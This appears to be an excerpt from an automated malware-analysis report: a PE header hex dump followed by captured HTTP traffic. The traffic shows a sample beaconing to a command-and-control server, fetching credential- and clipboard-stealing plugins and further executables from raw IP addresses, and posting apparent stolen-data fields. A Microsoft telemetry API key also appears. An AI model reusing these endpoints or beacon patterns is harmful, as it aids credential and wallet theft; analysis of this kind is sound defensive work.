00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1713490393138Host: self.events.data.microsoft.comContent-Length: 7974Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000054001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000055001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.56Content-Length: 4781Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000056001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000057031&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
